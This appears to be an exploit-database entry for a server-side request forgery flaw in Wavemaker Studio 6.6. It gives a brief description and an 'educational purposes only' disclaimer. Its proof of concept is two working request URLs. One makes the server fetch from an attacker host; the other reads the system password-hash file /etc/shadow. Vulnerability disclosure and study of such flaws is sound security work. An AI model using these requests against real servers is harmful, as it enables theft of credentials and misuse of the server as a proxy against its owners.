Wavemaker studio 6.6 serverside request forgery Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-08-06 |
Type : webapps |
Platform : java
This exploit / vulnerability Wavemaker studio 6.6 serverside request forgery is for educational purposes only and if it is used you will do on your own risk!
# Description
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy among other things.
# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow